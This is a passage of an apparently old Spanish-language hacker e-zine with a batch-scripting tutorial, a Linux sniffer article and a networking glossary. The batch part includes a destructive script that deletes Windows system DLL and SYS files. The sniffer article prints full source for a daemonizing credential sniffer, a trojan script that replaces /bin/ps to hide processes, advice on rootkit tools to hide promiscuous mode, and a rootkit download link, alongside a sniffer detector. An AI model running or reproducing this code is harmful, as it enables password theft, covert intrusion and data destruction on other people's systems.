que se encesite en el programa, ademas evitaremos el peligro de cambiar el
valor de "pi", esto conlleva tambien a que el programa es mucho mas facil de
corregir y analisar

Y asi vamos llegando al termino de esta segunda saga de nuestro curso de C, en
una proxima entrega intentare incluir mas programas y mas codigo, tratare de
complementar aun mas la teoria con la practica, bien es sabido que la unica
forma de aprender es practicando y para practicar ahy que escribir programas,
asique ahora todos tienen la tarea de intentar escribir algun programa con lo
que hemos visto hoy, por mi parte me despido y nos veremos en una proxima
entrega de este pequeño curso, bye!


Autor : EleKtr0
Titulo : Programacion en C
Entrega # : II
E-mail : elektro@electron-team.com
Link`s : www.lawebdelprogramador.com

,øñ°`´°ñø¸ 
-<[ 05 ]>-
`°ñø,¸,øñ°

Autor : ZychoLezz
Titulo : Programacion basica en batch
Comentario: Manos a la obra
Contenido : Seguramente te has preguntado que cosa es el autoexec.bat,o ves que
en muchos articulos sale mencionado y tu no entiendes para que sirve. Bueno,los
archivos *.bat o *.batch, son ejecutables al igual que los .exe o execute,o sea
uno escribe una serie de comandos en ellos, para que cumplan con alguna funcion
Sea correr algun programa, descomprimir archivos (como en los juegos cuando
ejecutas.bat para descomprimir la musica etc.), o incluso causar destruccion.

Para editar un archivo.bat simplemente ejecuta el notepad pon abrir y pon en
file name el nombre de un archivo .bat, ej: file.bat , o ejecuta de DOS el
edit.com y ahi abre el archivo .bat. Para comenzar borra lo que sale y escribe:


@echo off
echo ejecute un archivo.bat



Guarda el archivo y ejecutalo, se abrira una ventana y saldra " ejecute un
archivo .bat"
Arriba en la ventana saldra "finished" lo que significa k termino
El "@echo off", es para que no se vea el directorio donde esta y que salga lo k
escribiste, ya que si solo escribes esto:

echo hola, ejecute un archivo.bat

Saldra lo siguiente(dependiendo del directorio):

c:\ echo ejecute un archivo.bat
ejecute un archivo.bat

Por lo tanto ponemos "@echo off", si no queremos que vean o ver los comandos que
utilizamos y se vea solo lo k queremos que se vea.El "echo", sirve para escribir
es como un write, pones "echo", espacio y escribes lo que quieres. Si quieres k
al ejecutar el .bat escriba cualquier cosa pon:


@echo off
echo ELECTRON


Al ejecutar el .bat en la ventana de DOS saldra "ELECTRON".

Para ejecutar archivos, se especifica su directorio, por ejemplo:

@echo off
c:\juegoz\minigolf\mgolf.exe

Con esto se ejecutara el juego de golf.
Para agregarle comentarios al archivo, simplenmente se pone :: y luego el
comentario.


@echo off
:: Ejecuta el juego mgolf
c:\juegoz\minigolf\mgolf.exe


Otro comando interesante es el "goto" que quiere significa obviamente si sabes
ingles: ir a tal lugar. Si escribimos esto:


@echo off
:volver
echo Se repetira
goto volver
echo No se repetira


Al ejecutarlo, saldra continuamente sin detenerse "Se repetira", en cambio "No se
repetira"
, no saldra, ya que al llegar a "goto volver", vuelve a ":volver" y asi
este bucle o repeticion no parara, a menos que presiones ctrl+alt+supr o ctrl+c,
que hara que se detenga y salga finished.

Para que se borre lo que escribiste en la pantalla, se ocupa el comando "cls",que
significa clear screen. He aqui un ejemplo:


@echo off
echo ESTO NO SE VERA!!
cls
echo ESTO SI SE VERA!!


Aqui se veria, obviamente "ESTO SI SE VERA", pero si pones un cls al final no se
vera nada, captan? Eso es... Tambien existe el comando "Pause", k hace una pausa
y tras presionar cualquier tecla continua.

Ejemplo:


@echo off
echo Presiona cualquier tecla pa continuar
pause
cls
echo El programa ha terminado


Al ejecutar esto, saldra "Presiona cualquier tecla pa continuar" y mas abajo en
ingles, "Press any key to continue...". Despues de presionar cualquier tecla
saldra: "Este programa ha terminado"

Ahora si queremos crear un directorio ocupamos los siguiente "md c:\nuevacarpeta"
lo que significa "make directory" con lo cual crearas el directorio
"c:\nuevacarpeta". El muy simple codigo seria el siguiente:


@echo off
md c:\nuevacarpeta


Lo otro que se puede hacer es mover archivos de una carpeta a otra, cosa muy util
Por ejemplo si quiero mover "c:pool.exe" a "c:\dos\pool.exe", haria lo siguiente:


@echo off
move c:\pool.exe to c:\dos
cls
echo El archivo c:\pool.exe ha sido movido a c:\dos\pool.exe


Tambien puedes utilizar los comandos "copy & paste" o sea copiar y pegar.
Por ejemplo, quieres mover una imagen de un directorio a otro sin borrarlo seria
algo asi:


@echo off
copy c:\mydocu~1\image.bmp c:\dos
echo La foto "image.bmp" ha sido copiado al directorio "c:\dos"


Si quieres borrar todos los archivos de una carpeta pones:


@echo off
cd c:\shit
del c:\shit
cls
echo La archivos de la carpeta c:\shit han sido borrados


Al correr este programa, te preguntara si realmente quieres borrar los archivos
que borrara todos los archivos de ahi. Si pones yes lo hara, sino no.

TIP: si quieres que borre los archivos sin preguntarte,especifica lo que quieres
borrar, ya sea fotos, mp3, videos, etc., pon lo siguiente:


@echo off
cd c:\shit
del *.doc
del *.mp3
cd..
echo Se han borrado todos los archivos bitmap y mp3 y no te han preguntado


NOTA: si pones del *.* te preguntara si kieres eliminar todo,por lo k si quieres
hacer un .bat que borre archivos conviene, especificar el tipo de archivo.

Un .bat destructivo seria el siguiente:


@echo off
cd c:\windows\sytem
del *.dll
del *.sys


Este te borraria los dll's y sys que se encuentren en el directorio
c:\windows\system, aunque algunos no, ya que estan siendo usados por windows. Si
ya estas pensando en mandar a personas archivos .bat por IRC, que borren
informacion, te digo que la mayoria de los scripts, estan protegidos contra esos
archivos, al igual que contra los .exe y otros, pero para que destruir lo ajeno.

En todo caso si haces un .zip lo podria recibir alguien, aunque pesaria muy poco
ya que 1 caracter es 1 byte.


Un comando para ver los archivos de alguna carpeta es "dir". Asi seria:
@echo off
cd c:\mydocu~1
dir


Si queremos probar si es que existe un archivo o no, ponemos lo siguiente,
utilizando el comando "@if exist", el cual busca si existe o no, un archivo.


@echo off
@if exist c:\juegoz\pool\pool.exe echo Existe el archivo
@if not exist c:\juegoz\pool\pool.exe echo No existe el archivo


Otro comando es el call, que sirve para llamar a otro archivo .bat y no de otro
tipo. Se utiliza poniedo "call x.bat", siendo x el archivo bat.

Para ocupar una especia de menu, con opciones a elegir, se utiliza el
"choice /c12", siendo 1 y 2 las opciones.

Por ejemplo:


@ECHO off
ECHO 1: 10
ECHO 2: 20
ECHO 3: 30
ECHO 4: 40
ECHO 5: 50
ECHO.
choice /c12345 Hasta cuanto sabes contar?::
@IF ERRORLEVEL 1 ECHO Hasta 10
@IF ERRORLEVEL 2 ECHO y 20
@IF ERRORLEVEL 3 ECHO y 30
@IF ERRORLEVEL 4 ECHO y 40
@IF ERRORLEVEL 5 ECHO y 50


Otra cosa interesante que se puede hacer, es asignar variables, utilizando el
comando "set" luego espacio, el nombre de la variable y = lo que se le asigne.
Para ver la variable se pone entre %variable%, entre %'s.


@echo off
set variable1=ZychoLezz
set variable2=varible2
echo Hola, soy %variable1%
echo estas viendo la %variable2%
pause
cls
set variable1=He borrado la palabra ZychoLezz
set variable2= Y cambiado por otra cosa las dos variables anteriores
echo %variable1%
echo %variable2%


Se le puede asignar un valor de nada a la variable asi:


@echo off
set var1=Se ve la variable uno
echo %var1%
pause
cls
set var1=
echo ahora no


Lo siguiente que veremos es agregarle lineas a archivos, lo cual es muy util si
se le quiere agregar lineas al autoexec. para que ejecute programas al reiniciar
u otras cosas. Para esto se utiliza: "linea">elarchivo. Seria asi:


@echo off
cls
echo mande este mensaje al archivo leeme.txt >leeme.txt


Ahora al abrir el leeme.txt tendra escrito "mande este mensaje al archivo
leeme.txt"
, pero toda la otra informacion que tenga se borrara. Para que esto no
ocurra y solo a~ada otra linea mas, se usa el: >>


@echo off
cls
echo Le sume este mensaje al archivo leeme.txt >>leeme.txt


Bueno, esos son para comenzar comandos importantes en la programacion en BATCH,
pudiendo hacer programas mejores segun lo que queramos hacer, para ayudarnos
nuestros objetivos, ya sean hack, viri, crack u otra cosa. Cualquier comentario
o duda a: ZychoLezz@altavista.com o busquenme en irc.dal.net o irc.terra.cl


Autor : ZychoLezz
Titulo : Programacion basica en batch
E-mail : ZychoLezz@altavista.com







,øñ°`´°ñø¸
-<[ 06 ]>-
`°ñø,¸,øñ°

Autor : s0ul
Titulo : Snifferz
Comentario: Al grano
Contenido : (Este texto esta orientado al sniffeo basico en linux mas ke nada,
en otro articulo k escribire en otra ocasion veremos otros s/o y otros sniffer
mas sofisticados)

Los sniffers pueden presentar una gran amenaza de seguridad en la red, hoy en
dia los sniffers pueden estar en cualkier plataforma pudiendo ser Unix,Linux o
Windown. La amenaza de seguridad que presentan los sniffers,es su capacidad de
capturar passwd de acceso al server y a otros servidores ademas de otro tipo
de informacion que pueda ser sensible para ellos.Teoricamente los sniffers son
"invisibles" (ya veremos komo detectarlos).

Un Sniffer es un software que permite capturar todos los datos que pasan a
traves de una tarjeta de red. Basandonse en un defecto del protocolo ethernet
(el que se usa normalmente en las redes locales).

Ethernet normalmente manda los paquetes de datos a todas las estaciones de
red, siendo la tarjeta de red la encargada de verificar si el paquete entrante
es para esa estacion y si es asi lo recibe pero si no corresponde a esa
estacion no lo recibe y lo deja pasar,entonces lo que hace el sniffer es poner
la tarjeta en modo promiscuo (promiscuous mode).

El modo promiscuo signifika ke la tarjeta pesca todos los paketes ethernet
aunke no vayan dirigidos a ella.



=-[ Como trabajan los sniffers ]-=============================================

Tabamos viendo el modo promiscuo, digamos tambien ke ya hay algunas tarjetas
ke no aceptan la intalacion de sniffer en modo promiscuo komo las 3com, Bueno
lo k hace el snifferes es filtrar todos los paketes de Ethernet No almacenando
toda la mierda ke pasa por la tarjeta porke sino kedaria la media caga , asi
ke lo ke hace es examinar los paketes y ver las peticiones a unos determinados
puertos komo ej. 23, 21, 110, 25, 513106 y guarda los datos que nos interesan.
( si tu kieres logear otros puertos solo basta kon modificar los parametros
para ke logee otro puertos , mas segundos ,etc.. )

C0d3

aqui esta el fuente de linsniff muy facil de usar

--------corta aqui--------

// LinSniffer 0.666
// by humble of rhino9
// I am not responsible for what you do with this.

// This is like linsniffer, but it uses a linked list
// so it won't ignore any connections.

// based on original code by Mike Edulla

// how many bytes do you want to capture per connection?
// it mallocs this much memory for each connection so don't
// make it too high
#define MAXIMUM_CAPTURE 256
// how long before we stop watching an idle connection?
#define TIMEOUT 30
// log file name?
#define LOGNAME "tcp.log"

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <linux/if.h>
#include <signal.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <linux/socket.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/if_ether.h>
#include <sys/stat.h>
#include <fcntl.h>

int sock;
FILE *log;

struct connection
{
struct connection *next;

time_t start;
time_t lasthit;

unsigned long saddr;
unsigned long daddr;
unsigned short sport;
unsigned short dport;

unsigned char data[MAXIMUM_CAPTURE];
int bytes;
};

typedef struct connection *clistptr;

clistptr head,tail;

void add_node(unsigned long sa, unsigned long da,unsigned short sp,unsigned short dp)
{
clistptr newnode;

newnode=(clistptr)malloc(sizeof(struct connection));
newnode->saddr=sa;
newnode->daddr=da;
newnode->sport=sp;
newnode->dport=dp;
newnode->bytes=0;
newnode->next=NULL;
time(&(newnode->start));
time(&(newnode->lasthit));
if (!head)
{
head=newnode;
tail=newnode;
}
else
{
tail->next=newnode;
tail=newnode;
}
}

char *hostlookup(unsigned long int in)
{
static char blah[1024];
struct in_addr i;
struct hostent *he;

i.s_addr=in;
he=gethostbyaddr((char *)&i, sizeof(struct in_addr),AF_INET);
if(he == NULL) strcpy(blah, inet_ntoa(i));
else strcpy(blah, he->h_name);
return blah;
}

char *pretty(time_t *t)
{
char *time;
time=ctime(t);
time[strlen(time)-6]=0;
return time;
}

int remove_node(unsigned long sa, unsigned long da,unsigned short sp,unsigned short dp)
{
clistptr walker,prev;
int i=0;
int t=0;
if (head)
{
walker=head;
prev=head;
while (walker)
{
if (sa==walker->saddr && da==walker->daddr && sp==walker->sport && dp==walker->dport)
{
prev->next=walker->next;
if (walker==head)
{
head=head->next;;
prev=NULL;
}
if (walker==tail)
tail=prev;
fprintf(log,"============================================================\n");
fprintf(log,"Time: %s Size: %d\nPath: %s",pretty(&(walker->start)),walker->bytes,hostlookup(sa));
fprintf(log," => %s [%d]\n------------------------------------------------------------\n",hostlookup(da),ntohs(dp));
fflush(log);
for (i=0;i<walker->bytes;i++)
{
if (walker->data[i]==13)
{
fprintf(log,"\n");
t=0;
}
if (isprint(walker->data[i]))
{
fprintf(log,"%c",walker->data[i]);
t++;
}
if (t>75)
{
t=0;
fprintf(log,"\n");
}
}
fprintf(log,"\n");
fflush(log);
free (walker);
return 1;
}
prev=walker;
walker=walker->next;
}
}
}
int log_node(unsigned long sa, unsigned long da,unsigned short sp,unsigned short dp,int bytes,char *buffer)
{
clistptr walker;

walker=head;
while (walker)
{
if (sa==walker->saddr && da==walker->daddr && sp==walker->sport && dp==walker->dport)
{
time(&(walker->lasthit));
strncpy(walker->data+walker->bytes,buffer,MAXIMUM_CAPTURE-walker->bytes);
walker->bytes=walker->bytes+bytes;
if (walker->bytes>=MAXIMUM_CAPTURE)
{
walker->bytes=MAXIMUM_CAPTURE;
remove_node(sa,da,sp,dp);
return 1;
}
}
walker=walker->next;
}

}


void setup_interface(char *device);
void cleanup(int);


struct etherpacket
{
struct ethhdr eth;
struct iphdr ip;
struct tcphdr tcp;
char buff[8192];
} ep;

struct iphdr *ip;
struct tcphdr *tcp;

void cleanup(int sig)
{
if (sock)
close(sock);
if (log)
{
fprintf(log,"\nExiting...\n");
fclose(log);
}
exit(0);
}

void purgeidle(int sig)
{
clistptr walker;
time_t curtime;
walker=head;
signal(SIGALRM, purgeidle);
alarm(5);
// printf("Purging idle connections...\n");

time(&curtime);
while (walker)
{
if (curtime - walker->lasthit > TIMEOUT)
{
// printf("Removing node: %d,%d,%d,%d\n",walker->saddr,walker->daddr,walker->sport,walker->dport);
remove_node(walker->saddr,walker->daddr,walker->sport,walker->dport);
walker=head;
}
else
walker=walker->next;
}
}

void setup_interface(char *device)
{
int fd;
struct ifreq ifr;
int s;

//open up our magic SOCK_PACKET
fd=socket(AF_INET, SOCK_PACKET, htons(ETH_P_ALL));
if(fd < 0)
{
perror("cant get SOCK_PACKET socket");
exit(0);
}

//set our device into promiscuous mode
strcpy(ifr.ifr_name, device);
s=ioctl(fd, SIOCGIFFLAGS, &ifr);
if(s < 0)
{
close(fd);
perror("cant get flags");
exit(0);
}
ifr.ifr_flags |= IFF_PROMISC;
s=ioctl(fd, SIOCSIFFLAGS, &ifr);
if(s < 0) perror("cant set promiscuous mode");
sock=fd;
}

int filter(void)
{
int p;
p=0;

if(ip->protocol != 6) return 0;

p=0;
if (htons(tcp->dest) == 21) p= 1;
if (htons(tcp->dest) == 23) p= 1;
if (htons(tcp->dest) == 106) p= 1;
if (htons(tcp->dest) == 109) p= 1;
if (htons(tcp->dest) == 110) p= 1;
if (htons(tcp->dest) == 143) p= 1;
if (htons(tcp->dest) == 513) p= 1;
if (!p) return 0;

if(tcp->syn == 1)
{
// printf("Adding node syn %d,%d,%d,%d.\n",ip->saddr,ip->daddr,tcp->source,tcp->dest);
add_node(ip->saddr,ip->daddr,tcp->source,tcp->dest);
}
if (tcp->rst ==1)
{
// printf("Removed node rst %d,%d,%d,%d.\n",ip->saddr,ip->daddr,tcp->source,tcp->dest);
remove_node(ip->saddr,ip->daddr,tcp->source,tcp->dest);
}
if (tcp->fin ==1)
{
// printf("Removed node fin %d,%d,%d,%d.\n",ip->saddr,ip->daddr,tcp->source,tcp->dest);
remove_node(ip->saddr,ip->daddr,tcp->source,tcp->dest);
}
log_node(ip->saddr,ip->daddr,tcp->source,tcp->dest,htons(ip->tot_len)-sizeof(ep.ip)-sizeof(ep.tcp), ep.buff-2);
}


void main(int argc, char *argv[])
{
int x,dn;
clistptr c;
head=tail=NULL;

ip=(struct iphdr *)(((unsigned long)&ep.ip)-2);
tcp=(struct tcphdr *)(((unsigned long)&ep.tcp)-2);

if (fork()==0)
{
close(0); close(1); close(2);
setsid();
dn=open("/dev/null",O_RDWR);
dup2(0,dn); dup2(1,dn); dup2(2,dn);
close(dn);
setup_interface("eth0");

signal(SIGHUP, SIG_IGN);
signal(SIGINT, cleanup);
signal(SIGTERM, cleanup);
signal(SIGKILL, cleanup);
signal(SIGQUIT, cleanup);
signal(SIGALRM, purgeidle);

log=fopen(LOGNAME,"a");
if (log == NULL)
{
fprintf(stderr, "cant open log\n");
exit(0);
}

alarm(5);

while (1)
{
x=read(sock, (struct etherpacket *)&ep, sizeof(struct etherpacket));
if (x>1)
{
filter();
}
}
}
}


--------corta aqui--------

(Bueno no creo ke haga falta decirles komo kopilarlo o si?)

Para ajecutarlo tienes k korrerlo komo r00t dela siguiente manera: ./linsnif &
para que kede korriendo en segundo plano, guardando los logs en un archivo
llamado tcp.log con un timeout de 30 seg de los puertos ke habriamos definido
anteriormente, en el caso de que no te llegara a compilar puedes bajarlo
precompilado de algun rootkit "lrk" ke puedes obtenerlo en:

http://packetstorm.securify.com/UNIX/penetration/rootkits/lrk4.shad.tar.gz

Como cualquier programa ejecutado en segundo plano, se vera al hacer un simple
"ps" para ver los procesos, la solucion es usar un ps troyaneado sacado del
rootkit anteriormente nombrado o sino usar un shellscript creado por un
integrande de 0wn3d "Dr|3xe" que esconde hazta 3 procesos ala ves :)



--------corta aqui--------


#esconde procesos ... ps troyano ... permite esconder 3 procesos
# modo de uso: sh ps.sh <proceso1> <proceso2> <proceso3>
# ejemplo: sh ps.sh john eggdrop snifft piola :DDDD
#
# !! IMPORTANTE !! en el caso de querer esconder solo 1 proceso debe repetirse 3 veces
# [ingresar 3 veces el mismo]
# de lo contrario no compila ........
# - en el caso de querer esconder 2 procesos ingresar 2 veces el mismo
#
# no todo puede ser perfecto ... al ke no le guste 8=========D ahi tiene..
# by Dr|3xe
# comentarios: dr3xe@usa.net -- 0wn3dy2k@usa.net
#
trap "echo ; echo Exit ......; echo ; exit" 2
clear
echo "[][][][][][][][][][] :::[0wn3d]::: [][][][][][][][][][]"
echo
echo "[1] Ps Troyano (iniciar)"
echo "[2] Dejar como estaba el server "
echo
echo "Tu opcion:"
read opcion;
if [ $opcion -eq 1 ]; then
clear
echo
echo [][][][][][][][][] Ps Troyano [][][][][][][][][]
echo
echo "<nombre del proceso>"
echo
echo "proceso 1:>"
read uno
echo "proceso 2:>"
read dos
echo "proceso 3:>"
read tres
cat << _EOF_ >> .ps.c
#include <stdio.h>
#include <strings.h>
char buffer[5];
int main(int argc, char **argv)
{
printf("%s",argv[1]);
if (argc > 1) {
sprintf(buffer,"so %s >> x1",argv[1]);
}
else {
sprintf(buffer,"so -w >> x1");
}


falso();
}
falso(){
system(buffer);
system("grep -v -s $uno x1 > x2");
system("grep -v -s $dos x2 > x3");
system("grep -v -s $tres x3 > x4");
system("grep -v -s 'sh -i' x4 > x5");
system("grep -v -s 'sh -c' x5 > x6");
system("grep -v -s 'so' x6 > x7");
system("grep -v -s 'sh -c' x7 > x8");
system("cat x8");
system("rm -r -f x1");
system("rm -r -f x2");
system("rm -r -f x3");
system("rm -r -f x4");
system("rm -r -f x5");
system("rm -r -f x6");
system("rm -r -f x7");
system("rm -r -f x8");

}
_EOF_
cp /bin/ps /bin/so
rm /bin/ps
gcc .ps.c -o .ps
rm .ps.c
cp .ps /bin/ps
rm .ps
echo
echo [][][][][][][][] escondidos : $uno $dos $tres [][][][][][][][][]
echo
fi
if [ $opcion -eq 2 ]; then
rm /bin/ps
cp /bin/so /bin/ps
rm /bin/so
echo
echo [][][][][][][][][][] todo como antes :DDDDDD [][][][][][][][][][][]
echo
fi

--------corta aqui--------




=-[ Ocultarlos y Detectarlos ]-===============================================

Si intalas un sniffer sin tomar las debidas precauciones no te va durar nada.
Si el admin o cualkier otro usuario usa el comando ifconfig vera ke la tarjeta
esta en modo promiscuo,usando "ifconfig -a" un sniffer es facilmente detectado
saldria algo asi:

# ifconfig -a

eth0 Link encap:Ethernet HWaddr 00:00:1C:04:11:C6
inet addr:10.10.10.1 Bcast:255.255.255.255 Mask:255.255.255.0
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0
TX packets:0 errors:0 dropped:0 overruns:0
Interrupt:11 Base address:0x6800

para ke no lo detecten puedes usar el troyano ke se incluye en el rootkit "lrk"
"ifconfig" que remueve la bandera "Promisc" para esconder un sniffer.

Otra de las formas de poder ser detectado seria kon el komando "netstat -r" te
daria algo komo esto:

# netstat -r

Routing tables
Internet:
Destination Gateway Flags Refs Use Interface
default 0wn3d.gov UG 1 32949 eth0
localhost localhost UH 2 73 eth1


El uso del eth0 te puede parecer sospechoso,si es asi ejecutas "ifconfig eth0"
pudiendo ver si en realidad estaba siendo utilizada por algun sniffer.

#ifconfig eth0

le0: flags=8863<UP,BROADCAST,NOTRAILERS,RUNNING,PROMISC,MULTICAST>
inet 127.0.0.1 netmask 0xffffff00 broadcast 255.0.0.1


Tambien es posible usar algunos programas ke acedan directo a la tarjeta y ve
si el flag promisc esta activado. Como este:


--------corta aqui--------

#include <stdio.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <errno.h>
#if defined (__linux__)
#include <linux/if.h>
#else
#include <net/if.h>
#endif
#define size(p) (sizeof(p))

int dev_flags=0,
device_flags=0,
set_look_all=0;

int
main(int argc, char **argv) {
struct ifreq ifreq, *ifr;
struct ifconf ifc;
char buf[BUFSIZ], *cp, *cplim;

if(argc <= 1)
set_look_all++;

if((dev_flags = socket(PF_INET, SOCK_DGRAM, 0)) < 0) {
fprintf(stderr, "An error occured establiashing while establishing a socket\n");
perror("socket");
exit(1);
}

ifc.ifc_len = sizeof(buf);
ifc.ifc_buf = buf;

if(ioctl(dev_flags, SIOCGIFCONF, (char *)&ifc) < 0) {
perror("SIOCGIFCONF");
exit(1);
}
ifr = ifc.ifc_req;
cplim=buf+ifc.ifc_len;
for(cp = buf; cp < cplim;
cp += sizeof (ifr->ifr_name) + size(ifr->ifr_addr))
{
ifr = (struct ifreq *)cp;

if(argv[1])
if(strcmp(ifr->ifr_name, argv[1]) && !set_look_all)
continue;

ifreq = *ifr;
if(ioctl(dev_flags, SIOCGIFFLAGS, (char *)&ifreq) < 0)
{
fprintf(stderr, "SIOCGIFFLAGS: %s (get interface flags): %s\n", ifr->ifr_name,strerror(errno));
continue;
}

device_flags=0; device_flags = ifreq.ifr_flags;
fprintf(stdout, "%s: ", ifreq.ifr_name);

if((device_flags & IFF_PROMISC) != 0)
fprintf(stdout, "Promiscuous: Sniffer detected.\n");
else
fprintf(stdout, "Not-Promiscous: No Sniffers detected.\n");

if(!set_look_all)
exit(0);
else
continue;

}
if(!set_look_all)
fprintf(stdout, "%s: Unknown device.\n", argv[1]);

}

--------corta aqui--------



=-[ Sniffers en modo no promiscuo ]-==========================================

Bueno diremos ke intalando un sniffer en modo no promiscuo es casi imposible
ke lo pillen, ya que al estar la tarjeta sin flag promisc aunke pasen un scan
de sniffer no lo pillaran :P, lo malo esque solo podras capturar los paketes
Ethernet que vayan dirigidos solo a ese ordenador.


Para instalar el sniffer en modo no promiscuo lo ke tienes ke hacer es
ejecutar el sniffer, ke kede corriendo en segundo plano y con la tarjeta
kon el flag promisc activado. Para quitar el promisc puedes quitarlo tu
directamente con el ifconfig "ifconfig eth0 -promisc" despues desto el sniffer
kedara corriendo normal pero en modo no promiscuo.

Links :

- Maximum Security: A Hacker's Guide to Protecting Your Internet Site and Network
http://www.digibel.org/~tompy/hacking/maximum-security/ch12/ch12.htm

- Etherfind para SunOs4.1.x
- Snoop para Solaris 2.x y SunOs 4.1 (disponible en ftp playground.sun.com)
- Tcpdump 3.0 uses bpf compatible con muchas plataformas.
- Packetman, Interman, Etherman, Loadman estos funcionan en las siguientes
plataformas: SunOS, Dec-Mips, SGI, Alpha, and Solaris.
Estan disponibles en ftp.cs.curtin.edu.au:/pub/netman/[sun4c|dec-mips|sgi|alpha|solaris2]/[etherman-1.1a|interman-1.1|loadman-1.0|packetman-1.1].tar.Z
Packetman fue diseñado para capturar paquetes, mientras que Interman, Etherman,
y Loadman fueron diseñados para monitrear el trafiko.
- SniffIt para Linux, SunOs, Solaris, FreeBSD y IRIX.
http://sniffit.rug.ac.be/~coder/sniffit/files/sniffit.0.3.5.tar.gz
- krnsniff [Kernel based sniffer module]
http://packetstorm.securify.com/linux/modules/krnsniff.c


Autor : s0ul
Titulo : Snifferz
E-mail : syslogd@usa.net
Saludos : .:: 0wn3d ::. // www.0wn3d.f2s.com






,øñ°`´°ñø¸
-<[ 07 ]>-
`°ñø,¸,øñ°

Autor : EleKtr0
Titulo : "Electro-diccionario"
Entrega # : 1, A, B, C, D, E
Comentario: Quisas mas de alguna vez hemos llamado al "servicio tecnico" por X
motivo y resulta k nos empiezan a explicar con peras y manzanas y a tratarnos
como a unos imbesiles creyendo que poco menos con suerte encendemos nuestro PC
situacion que personalmente me molesta y cada vez que me sucede,le pido a kien
me atiende que hable porfavor con el vocabulario tecnico acorde a un
funcionario del nivel "servicio tecnico" les ha pasado alguna vez? yo creo que
si... de no ser haci, entonces tomen su preciado telefono y llamen a alguna
tienda comercial de computadoras que de "servicio tecnico" y haganle preguntas
referentes a redes, ancho de banda, protocolos etc, etc... y podran notar lo k
anteriormente les señale, sin duda que es ¡patetico!

Pero hay situaciones y situaciones, que quede claro que yo no estoy dudando de
del tipo de preparacion que tengan estos señores, o de sus conocimientos sobre
informatica ni mucho menos y k me disculpen los k leen el electron y trabajan
precisamente como "servicio tecnico", digo esto para evitar todo tipo de mal
entendido... bueno com les decia,me ha tocado de todo, desde quedar totalmente
sorprendido por la ignorancia de algunos que hablan cosas sin sentido, solo
palabras tiradas al aire que en conjunto suenan bonito y creen haci sorprender
a quien les plantea la pregunta y otros casos donde en verdad el nivel del
vocavulario que usan me han dejado atonito casi llegando a perplejo, de esta
experiencia me di cuenta que yo en lo personal manejaba un vocabulario muy
bajo por no decir basico, desde entonces que decidi a fijarme mas en lo k leia
y a anotar las palabras que no manejaba con su significado,mis investigaciones
eso si, fueron orientadas al vocabulario que se refiere a redes, topologias,
protocolos y cosas asi, creo tener una base bastante considerable de terminos
y jergas tipicas, ahora bien,tambien he pensado en aquellos que se inician y e
incluido terminos basicos, no mas bla!, bla!...

Contenido :

10base2: Es un estandar IEEE para usar el protocolo IEEE 802.3 a 10 Mbits con
un conductor electrico EtherNet delgado

10Base5: Es un estandar IEEE para usar el protocolo IEEE 802.3 a 10 Mbits con
un conductor electrico EtherNet grueso

10BaseT: Es un estandar IEEE para usar el protocolo IEEE 802.3 a 10 Mbits con
un conductor electrico paralelo trenzado sin proteccion

100BaseVG: Es un estandar IEEE para usar el protocolo IEEE 802.12 a 100 Mbits
con un conductor electrico paralelo sin proteccion

100BaseT: Otro estandar para usar el protocolo IEEE 802.3 a unos 100 Mbits con
un conductor paralelo sin proteccion y trenzado

802.3: Es un estandar para la capa fisica que especifica un protocolo CSMA/CD
este es el estadar que se utilisa para EtherNet

802.5: Es un estandar para la capa fisica que especifica un protocolo
token-passing para una topologia anillo, estandar usado en Token Ring

AFP: Suite de protocolos diseñados por Apple para apoyar el usao de los Mac

Ajuste por reduccion (downsizing): Este es el proceso en que las compañias
revisan sus operaciones y encontrar de alguna manera la forma de reducir
gastos aki por lo general recortan el personal y recortan el presupuesto para
la compra de equipos nuevos

Almacenamiento y envio: Aqui un sistema almacena datos y los ordena de forma k
puedan salir luego sin problemas a otro sistema

Ancho de Banda: Es la capacidad de transmicion de datos de un sistema

Anillo: Topologia de red que une a cada tarro con otro hasta formar una
especie de circulo cerrado

Componente frontal: Es donde un usuario se conecta a otro sistema para hacer
uso de los servicios del servidor, mas conocido como cliente

Componente posterior: Sistema que proporciona servicios a otro sistema
conocido como servidor

AppleShare: Sistema de servidor de archivos de Apple

ARCnet: Red computacional de recursos anexos

Arquitectura de MicroCanal:MCA,arquitectura de bus PC, 32 bits propiedad de
IBM

Arquitectura de Sistemas de Red: SNA, arquitectura de IBM para apoyar la
comunicacion entre sistemas incompatibles

Arquitectura Extendida Industrial Estandar: EISA, arquitectura de bus PC 32
bits compatible con el standar ISA

Arquitectura Industrial Estandar: ISA,arquitectura de bus PC 16 bits que se
usa o se usaba en la AT de IBM, llamada bus AT

Arranque, inicio remoto: Tecnica donde un cliente descarga o arranca programas
o informacion requerida para iniciar una sesion en la red

ASCII: codigo americano estandar para intercambio de informacion, este codigo
define que valores se utilizan para las letras, numero y symbolos mediante un
codigo de 7-bits y un octavo para su verificacion

Atenuacion: La degradacion progresiva de una señal conforme esta viaje a
travez de un conductor

Bajar: Transferencia de datos desde un servidor a un cliente

Banda base:Tecnica de comunicacion en la que se utiliza cable de red para
llevar un solo flujo de datos a la vez

Base de Datos: Se le llama asi a cualquier coleccion de datos, por ejemplo una
guia de telefonos es una base de datos o una serie de archivos que almacenan
datos para su posterior consulta

Banda Ancha:Tecnica de comunicaciones en la k el cableado de red se usa para
llevar multiples flujos de datos de manera simultanea

Bloqueo de Registro: Metodo que asegura que un programa accese a una base de
datos compartida y tenga acceso exclusivo a un registro

Brouter: Dispositivo que ejecuta funciones tanto de puente como de ruteador

Bus: Segmento a traves del cual se conectan dispositivos

Bloque del disco: Termino generico que describe las fallas del disco duro

Cable coaxial: Conductor electrico k se compone de dos almas conductoras,usado
para redes de computacion

Cache de disco: Tecnica que mantiene en la memoria cierta cantidad de datos
estos datos con frecuencia son los mas usados de manera que el usuario pueda
tener un acceso mas rapido a estos datos

Capa de Aplicacion: La parte superior del modelo de referencia OSI, que como
todos sabemos consta de 7 capas, aqui se almacenan los programas de usuarios
y de aplicacion

Capa de Conexion de datos: Esta es la segunda capa,esta capa pone los mensages
juntos y controla su flujo entre computadoras

Capa de Presentacion:Sexta capa del modelo OSI, aqui se llevan a cabo el
formato y la traduccion de datos

Capa de Red: Tercera capa del modelo OSI, controla el trafico de mensajes

